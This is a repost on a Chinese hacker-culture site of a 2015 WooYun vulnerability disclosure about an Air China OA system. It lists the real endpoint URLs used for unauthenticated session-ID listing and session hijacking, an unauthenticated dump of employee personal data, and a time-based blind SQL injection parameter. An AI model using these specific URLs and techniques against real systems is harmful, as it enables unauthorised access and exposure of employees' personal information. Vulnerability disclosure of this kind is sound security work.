记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中国国际航空某系统未授权访问+SQL注入

2015-12-10 05:45

http://oa.airchinapm.com:2001/yyoa/index.jsp

国航OA系统

密码加密,无法爆破

但是存在两处未授权访问,和SQL注入

漏洞证明:

1.可看全部sessionid

http://oa.airchinapm.com:2001/yyoa/ext/https/getSessionList.jsp?cmd=getAll

sessionid (2).png



劫持sessionid登陆可绕过密码

劫持sessionid.png



个人信息.png

通讯录.png

通知文件.jpg



2.http://oa.airchinapm.com:2001/yyoa/common/selectPersonNew/initData.jsp?trueName=1

可看全部员工信息,手机,邮箱,身份证等等

信息2.png



3.sql注入

code 区域
http://oa.airchinapm.com:2001/yyoa/common/selectPersonNew/initData.jsp?trueName=1*



trueName存在时间盲注

注入点.jpg



5个库

数据库.png



527个表

527个表.jpg



不深入了

修复方案:

删除页面

知识来源: www.wooyun.org/bugs/wooyun-2015-0148935

阅读:88496 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“中国国际航空某系统未授权访问+SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云